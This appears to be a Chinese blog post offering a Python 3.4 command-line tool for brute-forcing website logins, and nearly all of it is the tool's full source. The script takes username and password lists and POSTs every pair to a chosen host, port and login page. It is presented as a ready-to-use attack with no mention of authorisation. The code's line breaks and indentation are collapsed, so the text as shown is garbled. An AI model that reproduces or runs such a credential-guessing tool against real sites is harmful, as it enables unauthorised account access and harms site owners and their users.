Python3.4 暴力登陆(扫描)网站 工具

简单的写了一个，需求比较急，没有引入多线程等，可以参考

用法：

usage:    -u username #单个用户名    -U user list file #用户名列表，一行一个    -p password #单个密码    -P password list #密码列表，一行一个    -h target host #目的服务器地址    -r target port #目的端口    -l login page path,default is /login.html,do not need start with /;#登陆页面地址，默认/例如e.x.:xx.py -U ufile -P pfile -h 2.2.2.2 -r 8080 -l login.php;

代码如下：

#!/usr/bin/python# -*- coding: utf-8 -*-import re;import sys; import os,getopt,sys  import urllib.parse #python2.7 版本使用urllib2库，在3.4里面统一到了http.client及urllib里面import http.client, urllib.parseMAX_LINE=1000def open_url(base_url,path,test_data):test_data_urlencode = urllib.parse.urlencode(test_data)headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"}conn = http.client.HTTPConnection(base_url)conn.request("POST", path, test_data_urlencode, headers)response = conn.getresponse()return response.status#getopt命令行参数解析def parse_opt():popts={}  try:opts,args = getopt.getopt(sys.argv[1:],"u:p:U:P:h:r:l:")if len(opts) < 5:print("""usage:    -u username    -U user list file    -p password    -P password list    -h target host ispfile    -r target port    -l login page path,default is /login.html,do not need start with /;     e.x.:xx.py -U ufile -P pfile -h 2.2.2.2 -r 8080 -l /;""")sys.exit(1)for op,value in opts:if op == "-U":popts['isfile'] = Truepopts['user'] =valueelif op == "-u":popts['isfile'] = Falsepopts['user'] = value  elif op == "-p":  popts['ispfile'] = Falsepopts['pwd'] = valueelif op == "-P":  popts['ispfile'] = Truepopts['pwd'] = valueelif op == "-h":  popts['host'] = valueelif op == "-r":  popts['port'] = valueelif op == "-l":  popts['page'] = value except getopt.GetoptError:  print("usage: xx.py -u/U -p/P -h -r")return popts#读取文件def readline(filepath):    ret=[]    filepath=os.getcwd()+"\\"+filepath    print(filepath)    if filepath==None or filepath=="":            print("rule file path cannnot be None.")            sys.exit(0)    else:        if os.path.exists(filepath)==False:            print("rule file not found.")            sys.exit(0)    try:        file=open(filepath,'r')        for line in file:            ret.append(line)    except Exception as ex:        print(ex)        print("open file %s failed." %filepath)    finally:        file.close()    print(len(ret))    return retdef run():popts=parse_opt()if popts['isfile']:users=readline(popts['user'])else:users=[popts['user']]if popts['ispfile']:passwords=readline(popts['pwd'])else:passwords=[popts['pwd']]host='127.0.0.1' path='/login.html?'port='80'if popts['host']!="":host=popts['host']if popts['port']!="":port=popts['port']if popts['page']!="" and  popts['page']!="/":path=popts['page']elif popts['page']=="/":path=""if port=='80':ip_port=hostelse:ip_port="%s:%s" %(host,port)for user in users:for password in passwords:data={'username':user.strip(),'password':password.strip()}try:code=open_url(ip_port,path,data)if code==0:print("POST %s failed.exception msg is ret code 0.\r\n" %(path))else:print("POST %s ok.status is %s.\r\n" %(path,code))except Exception as e:print("POST %s failed.exception msg is %s\r\n" %(path,e))continueif __name__ == '__main__':run()